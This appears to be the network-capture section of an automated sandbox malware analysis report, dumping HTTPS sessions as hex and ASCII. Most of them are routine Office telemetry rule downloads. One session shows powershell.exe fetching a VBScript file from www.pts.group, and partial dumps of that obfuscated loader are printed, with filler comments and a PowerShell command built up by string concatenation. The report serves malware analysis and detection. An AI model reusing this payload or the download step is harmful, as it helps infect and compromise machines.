                                                                                                              2024-12-05 09:38:12 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                              Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                              2024-12-05 09:38:12 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                              Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                              2024-12-05 09:38:12 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                              2024-12-05 09:38:12 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                              Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              1192.168.2.64972313.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:14 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:14 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:14 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 408
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                              ETag: "0x8DC582BB56D3AFB"
                                                                                                              x-ms-request-id: 9ac3d201-201e-0000-03c5-45a537000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093814Z-1746fd949bd2cq7chC1EWRnx9g0000000250000000004acu
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:14 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              2192.168.2.64972013.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:14 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:14 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:14 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 450
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                              ETag: "0x8DC582BD4C869AE"
                                                                                                              x-ms-request-id: c4831996-901e-0016-39ce-45efe9000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093814Z-1746fd949bdlnsqphC1EWRurw00000000280000000008q6v
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:14 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              3192.168.2.64972213.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:14 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:14 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:14 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 2980
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                              ETag: "0x8DC582BA80D96A1"
                                                                                                              x-ms-request-id: 40031d31-601e-005c-53c5-45f06f000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093814Z-1746fd949bd7wvgbhC1EWR0rgs00000002hg0000000058bh
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:14 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              4192.168.2.64972113.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:14 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:14 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:14 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 2160
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                              ETag: "0x8DC582BA3B95D81"
                                                                                                              x-ms-request-id: 115d5b31-c01e-0046-4bcb-452db9000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093814Z-1746fd949bdfg4slhC1EWR34t000000002900000000092cp
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:14 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              5192.168.2.64971913.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:14 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:14 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:14 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 3788
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                              ETag: "0x8DC582BAC2126A6"
                                                                                                              x-ms-request-id: de059d0f-101e-008e-30c4-46cf88000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093814Z-1746fd949bd77mkmhC1EWR5efc00000002ug000000002t0a
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:14 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.64972968.66.226.116443416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:15 UTC167OUTGET /ab/ab.vbs HTTP/1.1
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                              Host: www.pts.group
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-05 09:38:15 UTC518INHTTP/1.1 200 OK
                                                                                                              Connection: close
                                                                                                              content-type: text/vbscript
                                                                                                              last-modified: Thu, 05 Dec 2024 00:26:19 GMT
                                                                                                              accept-ranges: bytes
                                                                                                              content-length: 45982
                                                                                                              date: Thu, 05 Dec 2024 09:38:15 GMT
                                                                                                              server: LiteSpeed
                                                                                                              strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                              x-frame-options: SAMEORIGIN
                                                                                                              x-content-type-options: nosniff
                                                                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                              2024-12-05 09:38:15 UTC850INData Raw: 0d 0a 27 4d 75 6c 64 79 72 65 6e 65 73 20 6d 75 72 61 2c 20 72 75 73 74 76 6f 67 6e 65 73 2c 20 70 72 65 63 6f 67 6e 69 7a 69 6e 67 3b 20 73 6b 79 74 73 65 6e 67 65 6c 2c 0d 0a 27 53 79 6e 6b 72 6f 6e 73 76 6d 6e 69 6e 67 65 72 6e 65 73 33 34 2c 20 6b 6a 6f 6c 65 73 6d 6d 65 6e 73 2c 20 75 6e 6f 72 69 67 69 6e 61 6c 20 74 61 6e 6b 65 6c 73 65 73 74 65 38 33 0d 0a 27 48 65 74 65 72 6f 64 6f 78 69 65 73 31 33 32 21 20 6d 75 72 67 61 3f 20 73 75 6c 70 68 75 72 6c 65 73 73 3f 0d 0a 0d 0a 27 41 6e 74 69 70 6f 64 69 73 74 65 6e 73 31 30 34 3b 20 69 6d 70 65 72 66 65 63 74 0d 0a 0d 0a 27 4b 72 79 70 74 6f 67 72 61 66 65 72 65 64 65 73 2e 20 75 6e 64 65 72 70 61 6e 74 65 6e 65 31 39 35 3b 20 67 68 65 74 74 6f 65 73 3b 20 6b 65 70 73 0d 0a 0d 0a 27 42 72 61 6e 64
                                                                                                              Data Ascii: 'Muldyrenes mura, rustvognes, precognizing; skytsengel,'Synkronsvmningernes34, kjolesmmens, unoriginal tankelseste83'Heterodoxies132! murga? sulphurless?'Antipodistens104; imperfect'Kryptograferedes. underpantene195; ghettoes; keps'Brand
                                                                                                              2024-12-05 09:38:15 UTC14994INData Raw: 4c 6e 64 73 3a 20 72 65 61 70 70 72 6f 70 72 69 61 74 65 21 20 64 65 66 69 62 72 69 6c 6c 61 74 6f 72 65 6e 73 2e 20 69 6e 64 65 73 6c 75 74 74 65 6e 64 65 20 61 6d 79 6c 6f 73 69 73 3b 0d 0a 0d 0a 27 53 69 6e 6b 65 6e 73 35 37 20 6b 61 6c 6b 79 6c 65 72 6e 65 3b 20 6c 65 64 69 67 67 6e 67 65 72 6e 65 34 20 63 61 72 61 76 61 6e 65 72 6e 65 73 36 38 0d 0a 27 43 6c 61 6e 73 77 6f 6d 65 6e 3b 20 6c 69 67 65 73 69 64 65 74 2c 0d 0a 27 4e 61 74 69 6f 6e 61 6c 66 6f 72 73 61 6d 6c 69 6e 67 65 72 6e 65 73 3f 20 61 6c 6c 65 72 67 69 72 61 6d 74 65 32 31 37 3f 20 75 64 76 69 6b 6c 69 6e 67 73 6d 75 6c 69 67 68 65 64 65 6e 73 20 68 79 70 65 72 73 70 69 72 69 74 75 61 6c 69 7a 69 6e 67 20 62 6c 64 6d 6c 6b 65 74 36 31 3a 0d 0a 0d 0a 27 61 72 6b 65 74 79 70 65 3b 20
                                                                                                              Data Ascii: Lnds: reappropriate! defibrillatorens. indesluttende amylosis;'Sinkens57 kalkylerne; lediggngerne4 caravanernes68'Clanswomen; ligesidet,'Nationalforsamlingernes? allergiramte217? udviklingsmulighedens hyperspiritualizing bldmlket61:'arketype;
                                                                                                              2024-12-05 09:38:16 UTC16384INData Raw: 65 64 38 37 20 3d 20 49 6e 66 69 78 65 64 38 37 20 2b 20 22 64 69 76 65 6e 65 22 0d 0a 49 6e 66 69 78 65 64 38 37 20 3d 20 49 6e 66 69 78 65 64 38 37 20 2b 20 22 73 73 3d 27 5c 4e 6f 22 0d 0a 27 53 63 69 6f 67 72 61 70 68 69 63 20 66 6f 72 76 69 73 6e 69 6e 67 65 72 20 73 74 65 70 68 65 6e 69 65 73 20 72 75 67 62 72 64 73 6d 6f 74 6f 72 65 72 6e 65 73 2e 20 72 65 61 70 70 72 6f 76 69 6e 67 0d 0a 49 6e 66 69 78 65 64 38 37 20 3d 20 49 6e 66 69 78 65 64 38 37 20 2b 20 22 6e 66 61 77 6f 72 64 77 6f 72 64 65 6e 69 6e 67 2e 52 65 77 6f 22 0d 0a 49 6e 66 69 78 65 64 38 37 20 3d 20 49 6e 66 69 78 65 64 38 37 20 2b 20 22 72 64 27 3b 77 6f 72 64 78 77 22 0d 0a 27 75 64 68 61 6c 65 72 65 6e 3b 20 6d 6f 6e 67 6f 6c 69 63 21 0d 0a 49 6e 66 69 78 65 64 38 37 20 3d 20
                                                                                                              Data Ascii: ed87 = Infixed87 + "divene"Infixed87 = Infixed87 + "ss='\No"'Sciographic forvisninger stephenies rugbrdsmotorernes. reapprovingInfixed87 = Infixed87 + "nfawordwordening.Rewo"Infixed87 = Infixed87 + "rd';wordxw"'udhaleren; mongolic!Infixed87 =
                                                                                                              2024-12-05 09:38:16 UTC13754INData Raw: 20 63 6f 72 77 6f 72 64 79 6e 64 65 22 0d 0a 27 4d 69 6c 69 65 75 62 65 73 6b 79 74 74 65 6c 73 65 73 73 65 6b 74 6f 72 65 72 6e 65 73 20 66 6c 79 76 65 72 65 2e 20 69 6e 64 6b 62 73 61 66 64 65 6c 69 6e 67 65 6e 0d 0a 49 6e 66 69 78 65 64 38 37 20 3d 20 49 6e 66 69 78 65 64 38 37 20 2b 20 22 72 65 73 20 28 45 6c 65 76 77 22 0d 0a 27 46 6f 72 70 6c 69 67 74 69 67 65 6c 73 65 72 6e 65 20 76 72 64 69 6c 61 64 65 64 65 73 2c 0d 0a 49 6e 66 69 78 65 64 38 37 20 3d 20 49 6e 66 69 78 65 64 38 37 20 2b 20 22 6f 72 64 69 6d 65 6e 73 20 27 22 0d 0a 49 6e 66 69 78 65 64 38 37 20 3d 20 49 6e 66 69 78 65 64 38 37 20 2b 20 22 54 65 24 20 49 67 54 61 4c 44 72 6f 20 53 42 22 0d 0a 0d 0a 55 76 69 6c 6a 65 6e 73 72 65 61 63 71 75 69 72 65 73 61 61 6e 64 73 76 20 3d 20 55
                                                                                                              Data Ascii: corwordynde"'Milieubeskyttelsessektorernes flyvere. indkbsafdelingenInfixed87 = Infixed87 + "res (Elevw"'Forpligtigelserne vrdiladedes,Infixed87 = Infixed87 + "ordimens '"Infixed87 = Infixed87 + "Te$ IgTaLDro SB"Uviljensreacquiresaandsv = U


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              7192.168.2.64973013.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:16 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:17 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:16 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 415
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                              ETag: "0x8DC582B9F6F3512"
                                                                                                              x-ms-request-id: d3611829-901e-007b-22c2-45ac50000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093816Z-1746fd949bdb8xvchC1EWRmbd400000002d0000000006adm
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:17 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
